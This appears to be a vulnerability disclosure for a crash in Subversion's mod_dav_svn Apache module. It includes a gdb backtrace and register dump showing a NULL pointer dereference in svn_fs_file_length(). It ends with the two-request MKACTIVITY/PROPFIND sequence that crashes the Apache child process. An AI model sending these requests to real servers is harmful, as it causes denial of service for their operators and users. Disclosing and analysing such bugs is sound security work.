`#########################
# Subversion MKACTIVITY #
#########################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
#######################################
# libsvn_fs's svn_fs_file_length() function
# tested on 1.6.17 and a few other versions
(gdb) where
#0 0x00007f2595db9d60 in svn_fs_file_length () from /usr/lib/x86_64-linux-gnu/libsvn_fs-1.so.1
#1 0x00007f25961f2d8b in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#2 0x00007f25961f37c5 in dav_svn__insert_all_liveprops () from /usr/lib/apache2/modules/mod_dav_svn.so
#3 0x00007f259682b37a in dav_run_insert_all_liveprops (r=0x7f2590df10a0, resource=0x7fff6e97e1a8, what=DAV_PROP_INSERT_VALUE, phdr=0x7fff6e97dff0) at mod_dav.c:4889
#4 0x00007f259682bc55 in dav_get_allprops (propdb=0x7f258d0db3d0, what=DAV_PROP_INSERT_VALUE) at props.c:655
#5 0x00007f2596824f5e in dav_propfind_walker (wres=0x7fff6e97e188, calltype=<optimized out>) at mod_dav.c:1949
#6 0x00007f25961fc6d1 in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#7 0x00007f25961fcb6d in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#8 0x00007f2596829bda in dav_method_propfind (r=0x7f2590df10a0) at mod_dav.c:2081
#9 dav_handler (r=0x7f2590df10a0) at mod_dav.c:4681
#10 dav_handler (r=0x7f2590df10a0) at mod_dav.c:4587
#11 0x00007f259e568b50 in ap_run_handler (r=0x7f2590df10a0) at config.c:159
#12 0x00007f259e568f9b in ap_invoke_handler (r=r@entry=0x7f2590df10a0) at config.c:377
#13 0x00007f259e579078 in ap_process_request (r=r@entry=0x7f2590df10a0) at http_request.c:282
#14 0x00007f259e575f38 in ap_process_http_connection (c=0x7f25917c0290) at http_core.c:190
#15 0x00007f259e56f510 in ap_run_process_connection (c=0x7f25917c0290) at connection.c:43
#16 0x00007f259e56f8f8 in ap_process_connection (c=c@entry=0x7f25917c0290, csd=<optimized out>) at connection.c:190
#17 0x00007f259e57dc2e in child_main (child_num_arg=child_num_arg@entry=6) at prefork.c:667
#18 0x00007f259e57e382 in make_child (slot=6, s=0x7f259e4d6818) at prefork.c:768
#19 make_child (s=0x7f259e4d6818, slot=6) at prefork.c:696
#20 0x00007f259e57eee6 in perform_idle_server_maintenance (p=<optimized out>) at prefork.c:903
#21 ap_mpm_run (_pconf=_pconf@entry=0x7f259e515028, plog=<optimized out>, s=s@entry=0x7f259e4d6818) at prefork.c:1107
#22 0x00007f259e553826 in main (argc=3, argv=0x7fff6e97e9b8) at main.c:755
(gdb)
(gdb) i r
rax 0x7fff6e97e1e0 140735048835552
rbx 0x7fff6e97e1a8 140735048835496
rcx 0x7f2590df7028 139799321079848
rdx 0x0 0
rsi 0x0 0
rdi 0x7fff6e97dec8 140735048834760
rbp 0x3 0x3
rsp 0x7fff6e97de78 0x7fff6e97de78
r8 0x7f2596833ee0 139799415701216
r9 0x1 1
r10 0x1 1
r11 0x1 1
r12 0x4e24 20004
r13 0x7f2590e08028 139799321149480
r14 0x7fff6e97dff0 140735048835056
r15 0x7f2590df7028 139799321079848
rip 0x7f2595db9d60 0x7f2595db9d60 <svn_fs_file_length>
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) x/i $rip
=> 0x7f2595db9d60 <svn_fs_file_length>: mov 0x30(%rsi),%rax
(gdb) x/x $rsi
0x0: Cannot access memory at address 0x0
Basically it requires two or more requests to crash the Apache child process (in mod_dav_svn / libsvn_fs). The fault is a NULL pointer dereference: rsi is 0 at the first instruction of svn_fs_file_length(), which reads 0x30(%rsi), so the memory access at address 0x0 fails with SIGSEGV.
-- cut --
1. MKACTIVITY /egg/!svn/act/foo HTTP/1.1
2. PROPFIND /egg/!svn/act/foo HTTP/1.1 (sigsegv)
-- cut --
EOF
`